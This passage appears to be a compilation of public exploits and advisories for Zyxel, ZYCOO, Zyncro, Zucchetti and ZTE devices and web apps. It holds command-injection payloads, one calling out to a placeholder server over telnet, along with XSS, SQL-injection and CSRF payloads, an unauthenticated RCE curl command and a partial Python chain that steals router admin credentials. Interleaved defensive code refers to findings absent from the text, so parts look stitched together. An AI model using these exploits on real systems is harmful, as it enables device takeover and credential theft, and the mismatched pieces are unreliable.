if(strlen(Post($packet,$target)) > 0){
    print "Seems Changed !";
}else{
    print "Humm , No Chance !";
}
//DoS : Post("",$target) ;
?>
            
# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf , 
https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml


HTTP Request :

POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
            
<!--
# Exploit Title: Zyxel NBG-418N v2 Modem CSRF Exploit & PoC
# Version: Zyxel NBG-418N v2 - V1.00(AAXM.6)C0
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @alicangonullu

Exploits :
-->

<html><head>
<title>NBG-418N v2 Modem CSRF Exploit & PoC</title>
</head><body>
<form action="http://10.0.0.1/login.cgi" method="POST">
<input type="text" name="username" id="username" value="admin" /><br />
<input type="text" name="password" id="password" value="1234" /><br />
<input id="loginBtn" onclick="return onlogin()" type='submit' 
value='Go!' />
<input type="hidden" name="submit.htm?login.htm" value="Send">
</form>
</body></html>
            
# Exploit Title: Zyxel Armor X1 WAP6806 - Directory Traversal
# Date: 2020-06-19
# Exploit Author: Rajivarnan R
# Vendor Homepage: https://www.zyxel.com/
# Software [http://www.zyxelguard.com/WAP6806.asp]
# Version: [V1.00(ABAL.6)C0]
# CVE: 2020-14461
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/06/19 [YYYY/MM/DD]

# As a result of the research, one vulnerability was identified
# (Directory Traversal).
# Technical information is provided below step by step.

# [1] - Directory Traversal Vulnerability

# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/Zyxel/images/eaZy/

# Proof of Concept: https://TARGET/Zyxel/images/eaZy/
            
source: https://www.securityfocus.com/bid/49741/info

Zyncro social network is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com//zwall/list/filter//appIdFilter//shareGroupUrnFilter/c3luY3J1bTpzaGFyZWdyb3VwOjMyYjMyZjljLTg3OWEtNDRjNC05ZWY1LTE2ZDQ4YTlhYTE2Nycgb3IgJzEnIGxpa2UgJzEnIGxpbWl0IDIwMCAtLQ==/shareGroupTypeFilter//shareDocumentUrnFilter/?popup=1&ayuda=&actualSection=folders&plainView=1&rand=9809 
            
source: https://www.securityfocus.com/bid/49740/info

Zyncro is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Note: To exploit these issues, an attacker must have the ability to create a new group and capture the packets transferred.

An attacker could exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Zyncro 3.0.1.20 is vulnerable; other versions may also be affected. 

One of the functionalities of Zyncro is the possibility of creating
groups. The name and description of the groups are not correctly
sanitized, and it is possible to carry out some attacks.

In order to perform the attack, you must create a new group and capture the
packet sent to the server so you can modify it, because validation is
done client-side only, using JavaScript.

The original request has three POST data parameters like:
popup=1   &   name=dGVzdA%3D%3D   &   description=dGVzdA%3D%3D

Important data are 'name' and 'description' parameters, which are
base64 encoded. In this case, both values are 'test':
 url_decode(dGVzdA%3D%3D)
 b64decode(dGVzdA==)
 test

It is possible to provoke the XSS by changing those values as follows:
"><script>alert("XSS attack")</script>

Values MUST be in base64, so:
b64encode(""><script>alert("XSS attack")</script>") =
Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=

Finally the post-data of the request would become:
popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d

Once the request has reached the server, a new group will be created,
and any time someone views the name/description of the group a
pop-up will appear; this is the simplest attack.
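As an added example (not part of any report on this page, and not code from Zyxel or Zyncro), the following shows context-aware output encoding for the findings above: the mp_idx value spliced into a JavaScript string literal, the stored hostname and rpAuth id echoed into HTML, and Zyncro's base64-transported group name validated on the server instead of only in the browser. Payloads are constructed with the shapes reported above; the attacker host name is a placeholder.

```python
import base64
import binascii
import html
import json
import re

# Constructed payloads with the same shapes as the findings above.
MP_IDX_PAYLOAD = "\";$.getScript('//attacker.example/z');//"
HOSTNAME_PAYLOAD = "X<svg onload=alert()>"
RPAUTH_ID_PAYLOAD = '</form><iMg src=x onerror="prompt(1)"><form>'
GROUP_NAME_B64 = "Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4="   # from the Zyncro report


def render_js_var_vulnerable(name: str, value: str) -> str:
    """The pattern behind the mp_idx finding: raw concatenation into a
    JavaScript string literal, so a '"' in the value ends the literal and
    the rest of the value runs as code."""
    return f'var {name} = "{value}";'


def js_string_literal(value: str) -> str:
    """Encode a value as a JavaScript string literal that cannot leave its
    context inside a <script> block: JSON escaping handles quotes and
    backslashes; the extra replacements neutralise '</script>' and the two
    line terminators JSON permits but JavaScript source does not."""
    literal = json.dumps(value)
    return (literal.replace("</", "<\\/")
            .replace("\u2028", "\\u2028")
            .replace("\u2029", "\\u2029"))


def render_js_var(name: str, value: str) -> str:
    """Hardened counterpart of render_js_var_vulnerable."""
    return f"var {name} = {js_string_literal(value)};"


def render_html_text(value: str) -> str:
    """Encode for an HTML text or quoted-attribute context (the stored
    hostname cell, the echoed rpAuth id)."""
    return html.escape(value, quote=True)


# Allowlist for a group name or description after base64 transport decoding.
GROUP_FIELD_RE = re.compile(r"^[\w .,'()-]{1,64}$")


def decode_group_field(encoded: str) -> str:
    """Server-side counterpart of Zyncro's client-only check: decode the
    base64 field, then validate the plain text before it is stored.
    Raises ValueError on bad encoding or on characters outside the allowlist."""
    try:
        decoded = base64.b64decode(encoded, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("group field is not valid base64 UTF-8") from exc
    if not GROUP_FIELD_RE.fullmatch(decoded):
        raise ValueError(f"group field rejected: {decoded!r}")
    return decoded


if __name__ == "__main__":
    print(render_js_var_vulnerable("mp_idx", MP_IDX_PAYLOAD))   # statement is split
    print(render_js_var("mp_idx", MP_IDX_PAYLOAD))              # one string literal
    print(render_html_text(HOSTNAME_PAYLOAD))
    print(decode_group_field("dGVzdA=="))
    try:
        decode_group_field(GROUP_NAME_B64)
    except ValueError as exc:
        print(exc)
```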
            
Vulnerable hardware : ZYCOO IP phone system
Vendor : zycoo.com
Author : Ahmed sultan (@0x4148)
Email : 0x4148@gmail.com

Summary : According to the vendor's site,
CooVox Series IP Phone System is the most innovative solution for VoIP telecommunication in SMB (Small and Medium-sized Business) market.
They provide not only traditional PBX functions such as automated attendant and voicemail,
but also offer many advance telephony features, including remote extensions, remote office connection,
IVR, call recording, call detail records(CDR)…

Vulnerable file : /www/cgi-bin/system_cmd.cgi

Code shot : 

#!/bin/hush
printf '\r\n'
if [ -n "$REQUEST_METHOD" ]; then
        case "$REQUEST_METHOD" in
        (GET)
        if [ -n "$QUERY_STRING" ]; then
        for args in `echo "$QUERY_STRING" | tr "&" " "`
        do
                param=`echo "$args" | cut -d "=" -f 1`
                value=`echo "$args" | cut -d "=" -f 2`
                eval "export $param=$value"
        done
        fi
        ;;
  esac
fi
INI_FILE=/etc/asterisk/manager.conf
INI_SECTION=$username
eval `sed -e 's/[[:space:]]*\=[[:space:]]*/=/g' \
    -e 's/;.*$//' \
    -e 's/[[:space:]]*$//' \
    -e 's/^[[:space:]]*//' \
    -e "s/^\(.*\)=\([^\"']*\)$/\1=\'\2\'/" \
   < $INI_FILE \
    | sed -n -e "/^\[$INI_SECTION\]/,/^\s*\[/{/^[^;].*\=.*/p;}"`
password="`/etc/scripts/decodeURI $password`"
[ -z "$secret" ] && secret=`/etc/scripts/getkeyvalue.sh ${INI_SECTION} vmsecret`
if [ "$password" = "$secret" ]; then
        cmd=`echo $cmd | sed 's/%20/ /g'`
#       cmd=`echo $cmd | sed -e's/%\([0-9A-F][0-9A-F]\)/\\\\\x\1/g;s/?r//g' | xargs echo`
        $cmd

The GET parameter cmd can be used to execute system commands directly, with no prior authentication required,
which leads to full hardware takeover.

POC
[0x4148:/R1z]# curl http://server:9999/cgi-bin/system_cmd.cgi\?cmd\='cat%20/etc/passwd'
root:$1$C6ouMLFa$pb2/Bu1bcWpBNcX38jTva0:0:0:root:/:/bin/sh
nobody:x:99:99:Nobody::

Also, by reading the file /etc/asterisk/manager.conf, the hardware admin's
password can be obtained in plain text.

Fixing?
Unfortunately the hardware frontend depends heavily on this file, and the vendor has been extremely lazy about replying to emails regarding this vulnerability,
so the best fix for now is to allow browsing of the web interface from the local network only.
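How the same request handling looks without eval and without handing the cmd parameter to a shell, as an added example that is not the vendor's code: query parameters are parsed into a dict and unknown names rejected, the password is compared in constant time, and cmd can only select an entry from a server-owned argv allowlist (the allowlist contents and function names are assumptions).

```python
import hmac
import subprocess
from urllib.parse import parse_qs

# Only the parameters the CGI actually consumes; anything else is rejected
# instead of being exported into the shell environment with eval.
ALLOWED_PARAMS = {"username", "password", "cmd"}

# Hypothetical allowlist: the request names a command, the server owns the
# argv.  The original script handed $cmd to the shell verbatim.
COMMANDS = {
    "uptime": ["uptime"],
    "diskfree": ["df", "-h"],
}


def parse_query(query_string):
    """Parse QUERY_STRING into a dict without ever evaluating it.

    Unknown parameter names raise ValueError: the original loop let any
    name=value pair set a shell variable before the password was checked.
    """
    params = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        if name not in ALLOWED_PARAMS:
            raise ValueError(f"unexpected parameter {name!r}")
        params[name] = values[-1]  # last occurrence wins, as with the eval loop
    return params


def authorize(params, secret):
    """Constant-time comparison of the supplied password with the stored secret."""
    supplied = params.get("password", "")
    return bool(secret) and hmac.compare_digest(supplied.encode(), secret.encode())


def handle_request(query_string, secret):
    """Return (status, detail); detail is the argv to run when status is 200."""
    try:
        params = parse_query(query_string)
    except ValueError as exc:
        return 400, str(exc)
    if not authorize(params, secret):
        return 401, "authentication required"
    argv = COMMANDS.get(params.get("cmd", ""))
    if argv is None:
        return 403, "command not permitted"
    return 200, argv


def run_allowed(argv):
    """Execute a resolved argv directly (no shell) and return its stdout."""
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout


if __name__ == "__main__":
    # The PoC request above, checked against a constructed secret.
    print(handle_request("cmd=cat%20/etc/passwd", "vmsecret-constructed"))
    print(handle_request("username=admin&password=vmsecret-constructed&cmd=uptime",
                         "vmsecret-constructed"))
```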
            
# Exploit Title: Zuz Music 2.1 - 'zuzconsole/___contact ' Persistent Cross-site Scripting
# Google Dork: N/A
# Date: 14 Feb 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://zuz.host/
# Software Link: https://codecanyon.net/item/zuz-music-advance-music-platform-system/21633476
# Version: 2.1
# Tested on: WIN7_x68/Linux
# CVE : N/A

# Description:
----------------------
ZuzMusic 2.1 suffers from a persistent Cross-Site Scripting vulnerability.

# POC:
----------------------
1. Go To https://[PATH]/contact
2. There are three vulnerable parameters: name, subject and message.
3. Inject the JavaScript code.
4. The injected JavaScript code is executed when the Administrator opens the malicious message at https://demos.zuz.host/gmusic/admin/inbox.

# Request:
----------------------
POST /gmusic/zuzconsole/___contact HTTP/1.1
Host: server
Connection: close
Content-Length: 155
Accept: application/json, text/plain, */*
Origin: https://demos.zuz.host
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://server/gmusic/contact
Accept-Encoding: gzip, deflate
X-XSS-Protection: 0

{"type":"general","name":"<script>alert(0)</script>","mail":"mail@example.com","subject":"<script>alert(1)</script>","message":"<script>alert(2)</script>"}


# Response:
----------------------
HTTP/1.1 200 OK
Date: Fri, 15 Feb 2019 01:30:19 GMT
Server: Apache
Connection: close
Content-Type: application/json
Content-Length: 183

{
    "kind": "zuz#contactMessageSent",
    "etag": "hnwdHsGYwqI6CCSoRSXDMG1BEDTbMMFrOcayLdTYeOs",
    "message": "We have recieved your query and will get back to you in 24 hours."
}
            
source: https://www.securityfocus.com/bid/52720/info

FbiLike is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

FbiLike 1.00 is vulnerable; other versions may also be affected. 

http://www.example.com/fbilike/like.php?id=[XSS] 
            
# Exploit Title: Zucchetti Axess CLOKI Access Control 1.64 - Cross Site Request Forgery (CSRF)
# Date: 13/12/2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.axesstmc.com/cloki/

<!--

Zucchetti Axess CLOKI Access Control 1.64 CSRF Disable Access Control


Vendor: Zucchetti Axess S.p.A.
Product web page: https://www.axesstmc.com
Affected version: 1.64
                  1.63
                  1.54


Summary: CLOKI is the pre-installed application on our terminals that
provides simple to use access control management and attendance monitoring
using any browser (IE, Chrome, Firefox, etc.). It is suited for anyone
looking for a stand-alone Access Control and Attendance Monitoring system
where the users' data is not frequently changed. Data management is simple
and intuitive and no additional software is needed on the PC intended to be used
as web base. CLOKI for Access Control also allows configuration and monitoring
of access at all company entrances (doors, gates, turnstiles etc.). The Access
Control manages any type of reader, entrance and access credential. Using an
impartial selector it is possible to check that employees do not take company
assets and allows registration of all accesses to the system and all operations
that users carry out.

Desc: The application interface allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests. These
actions can be exploited to disable access control and to change account passwords
with administrative privileges if a logged-in user visits a malicious web
site.

Tested on: Start X3 (h02 build 4163)
           Start X1 (g01 build 2804)
           X1/X2/X3/X4/X7 Web Server


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2021-5689
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5689.php


13.11.2021

-->


CSRF disable AC:
----------------
<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


CSRF enable AC:
---------------
<html>
  <body>
    <form action="http://10.0.0.2:8081/redirect.cgi">
      <input type="hidden" name="flagAccessControlChanged" value="true" />
      <input type="hidden" name="ACtrl" value="on" />
      <input type="hidden" name="RAct" value="5" />
      <input type="hidden" name="EnR" value="1" />
      <input type="hidden" name="ExR" value="1" />
      <input type="hidden" name="DenyRTout" value="5" />
      <input type="hidden" name="DenyR" value="0" />
      <input type="hidden" name="IType" value="0" />
      <input type="hidden" name="E485" value="on" />
      <input type="hidden" name="GType" value="0" />
      <input type="hidden" name="TOO" value="50" />
      <input type="hidden" name="TOC" value="50" />
      <input type="hidden" name="TOOE" value="100" />
      <input type="hidden" name="TOCE" value="100" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
            
Document Title:
===============
ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1522


Release Date:
=============
2015-06-16


Vulnerability Laboratory ID (VL-ID):
====================================
1522


Common Vulnerability Scoring System:
====================================
6


Product & Service Introduction:
===============================
ZTE zxv10 w300 ADSL wireless router cat family gateway (accessories include a host, a power line, a line of 1 root, separator, 1)

(Copy of the Vendor Homepage:  http://wwwen.zte.com.cn/en/products/access/cpe/201302/t20130204_386351.html )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote vulnerability in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.


Vulnerability Disclosure Timeline:
==================================
2015-06-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
ZTE Corporation
Product: ZTE ZXV10 W300 3.1.0c_DR0


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A session vulnerability has been discovered in the official ZTE Corporation ZXV10 W300 v3.1.0c_DR0 modem hardware.
The security vulnerability allows remote attackers to block/shut down or delete network settings and components.

The LAN configuration is posted to /Forms/home_lan_1, and the page /home_lan_1 stores the configuration of the router.
An attacker can request the /Forms/home_lan_1 path via the GET method, and the modem then deletes all LAN configuration automatically.
The problem is that a GET request to the /Forms/home_lan_1 path deletes all the configuration. A hard reset is required
after successful exploitation of the issue.

The security risk of the router UI web vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.0.
Exploitation of the web vulnerability requires no privileged web-application user account and low user interaction (clicking a link).
Successful exploitation of the vulnerability results in a reset of the modem device, shutdown of the network/LAN, or compromise of running services.

Request Method(s):
				[+] POST

Vulnerable Module(s):
				[+] Forms/

Affected Module(s):
				[+] home_lan_1


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction (a click).
For a security demonstration, or to reproduce the issue, follow the information and steps provided below.

--- PoC Session Logs [GET] ---
13:18:35.526[0ms][total 0ms] 
Status: pending[]
GET http://192.168.1.1/Forms/home_lan_1 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[unknown] Mime Type[unknown]
Request Headers:   
Host[192.168.1.1]   
User-Agent[Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0]   
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]   
Accept-Language[en-US,en;q=0.5]   
Accept-Encoding[gzip, deflate]
X-Forwarded-For[8.8.8.8]
Connection[keep-alive]
Authorization[Basic YWRtaW46YWRtaW4=]

Note: The victim only needs to click to perform the GET request, with a non-expired session, for it to execute!

Reference(s):
http://localhost/Forms/home_lan_1 
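The server-side guard that both the CLOKI redirect.cgi forms and the W300 /Forms/home_lan_1 request above would run into, as an added example that is neither vendor's code: state-changing endpoints refuse GET, require a same-origin Origin or Referer, and require a per-session token that a cross-site page cannot supply. The endpoint set, the header handling and the token parameter name are assumptions; the device origins and the session token are constructed.

```python
import hmac
from urllib.parse import urlsplit

# Endpoints from the two advisories that change device state.
STATE_CHANGING = {"/redirect.cgi", "/Forms/home_lan_1"}


def origin_of(url):
    """scheme://host[:port] of a URL, or None if it has no usable origin."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None  # covers "Origin: null" and relative or empty values
    return f"{parts.scheme}://{parts.netloc}"


def check_request(method, path, headers, form, device_origin, session_token):
    """Decide whether a request may reach a state-changing handler.

    Returns (allowed, reason).  Three rules, each of which stops the PoCs:
    1. GET never changes state, so a link or an auto-submitted <form> that
       only performs a GET cannot flip access control or wipe the LAN config.
    2. The Origin (or, failing that, Referer) must match the device itself.
    3. A per-session token must accompany the form: the browser attaches
       cookies and Basic-auth credentials automatically, but not a token.
    """
    if path not in STATE_CHANGING:
        return True, "not a state-changing endpoint"
    if method.upper() != "POST":
        return False, "state change must use POST"
    hdrs = {k.lower(): v for k, v in headers.items()}
    source = hdrs.get("origin") or hdrs.get("referer")
    if source is None:
        return False, "missing Origin and Referer"
    if origin_of(source) != device_origin:
        return False, f"cross-origin request from {origin_of(source)}"
    token = form.get("csrf_token", "")
    if not token or not hmac.compare_digest(token.encode(), session_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


if __name__ == "__main__":
    # Constructed: the CLOKI "disable AC" form as a browser would submit it
    # from a third-party page, and the W300 LAN-reset GET with Basic auth.
    cloki_form = {"flagAccessControlChanged": "true", "RAct": "5", "EnR": "1"}
    print(check_request("GET", "/redirect.cgi", {"Referer": "http://other.example/"},
                        cloki_form, "http://10.0.0.2:8081", "token-constructed"))
    print(check_request("GET", "/Forms/home_lan_1",
                        {"Authorization": "Basic YWRtaW46YWRtaW4="}, {},
                        "http://192.168.1.1", "token-constructed"))
```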


Security Risk:
==============
The security risk of the remote vulnerability in the interface service is estimated as high. (CVSS 6.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Hadji Samir [s-dz@hotmail.fr]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]

-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
# Exploit Title:  ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/

import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES

def login(host, port, username, password):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "Username": username,
        "Password": password,
        "Frm_Logintoken": "",
        "action": "login"
    }
    
    requests.post(f"http://{host}:{port}/", headers=headers, data=data)

def logout(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_LogOff": "1",
        "IF_LanguageSwitch": "",
        "IF_ModeSwitch": ""
    }
    
    requests.post(f"http://{host}:{port}/", headers=headers, data=data)    

def leak_config(host, port):
    conn = http.client.HTTPConnection(host, port)
    boundary = "---------------------------25853724551472601545982946443"
    body = (
        f"{boundary}\r\n"
        'Content-Disposition: form-data; name="config"\r\n'
        "\r\n"
        "\r\n"
        f"{boundary}--\r\n"
    )

    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "Connection": "keep-alive",
    }

    conn.request("POST", "/getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp", body, headers)

    response = conn.getresponse()
    response_data = response.read()

    with open("config.bin", "wb") as file:
        file.write(response_data)

    conn.close()

def _read_exactly(fd, size, desc="data"):
    chunk = fd.read(size)
    if len(chunk) != size:
        return None
    return chunk

def _read_struct(fd, fmt, desc="struct"):
    size = struct.calcsize(fmt)
    data = _read_exactly(fd, size, desc)
    if data is None:
        return None
    return struct.unpack(fmt, data)

def read_aes_data(fd_in, key):
    encrypted_data = b""
    while True:
        aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
        if aes_hdr is None:
            return None
        _, chunk_len, marker = aes_hdr

        chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
        if chunk is None:
            return None

        encrypted_data += chunk
        if marker == 0:
            break

    cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
    fd_out = BytesIO()
    fd_out.write(cipher.decrypt(encrypted_data))
    fd_out.seek(0)
    return fd_out

def read_compressed_data(fd_in, enc_header):
    hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
    if enc_header[6] != hdr_crc:
        return None

    total_crc = 0
    fd_out = BytesIO()

    while True:
        comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
        if comp_hdr is None:
            return None
        uncompr_len, compr_len, marker = comp_hdr

        chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
        if chunk is None:
            return None

        total_crc = zlib.crc32(chunk, total_crc)
        uncompressed = zlib.decompress(chunk)
        if len(uncompressed) != uncompr_len:
            return None

        fd_out.write(uncompressed)
        if marker == 0:
            break

    if enc_header[5] != total_crc:
        return None

    fd_out.seek(0)
    return fd_out

def read_config(fd_in, fd_out, key):
    ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
    if ver_header_1 is None:
        return

    ver_header_2_offset = 0x14 + ver_header_1[4]

    fd_in.seek(ver_header_2_offset)
    ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
    if ver_header_2 is None:
        return
    ver_header_3_offset = ver_header_2[10]

    fd_in.seek(ver_header_3_offset)
    ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
    if ver_header_3 is None:
        return
    signed_cfg_size = ver_header_3[3]

    file_size = stat(fd_in.name).st_size

    fd_in.seek(0x80)
    sign_header = _read_struct(fd_in, ">3I", desc="signature header")
    if sign_header is None:
        return
    if sign_header[0] != 0x04030201:
        return

    sign_length = sign_header[2]

    signature = _read_exactly(fd_in, sign_length, desc="signature")
    if signature is None:
        return

    enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
    if enc_header_raw is None:
        return
    encryption_header = struct.unpack(">15I", enc_header_raw)
    if encryption_header[0] != 0x01020304:
        return

    enc_type = encryption_header[1]

    if enc_type in (1, 2):
        if not key:
            return
        fd_in = read_aes_data(fd_in, key)
        if fd_in is None:
            return

    if enc_type == 2:
        enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
        if enc_header_raw is None:
            return
        encryption_header = struct.unpack(">15I", enc_header_raw)
        if encryption_header[0] != 0x01020304:
            return
        enc_type = 0

    if enc_type == 0:
        fd_in = read_compressed_data(fd_in, encryption_header)
        if fd_in is None:
            return

    fd_out.write(fd_in.read())
    
def decrypt_config(config_key):
    encrypted = open("config.bin", "rb")
    decrypted = open("decrypted.xml", "wb")
    
    read_config(encrypted, decrypted, config_key)
    
    with open("decrypted.xml", "r") as file:
        contents = file.read()
        username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
        password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
        
    encrypted.close()
    os.system("rm config.bin")
    decrypted.close()
    os.system("rm decrypted.xml")

    return username, password

def change_log_level(host, port, log_level):
    level_map = {
        "critical": "2",
        "notice": "5"
    }

    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Apply",
        "_BASICCONIG": "Y",
        "LogEnable": "1",
        "LogLevel": level_map[log_level],
        "ServiceEnable": "0",
        "Btn_cancel_LogManagerConf": "",
        "Btn_apply_LogManagerConf": "",
        "downloadlog": "",
        "Btn_clear_LogManagerConf": "",
        "Btn_save_LogManagerConf": "",
        "Btn_refresh_LogManagerConf": ""
    }
    
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def change_username(host, port, new_username, old_password):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Apply",
        "_InstID": "IGD.AU2",
        "Right": "2",
        "Username": new_username,
        "Password": old_password,
        "NewPassword": old_password,
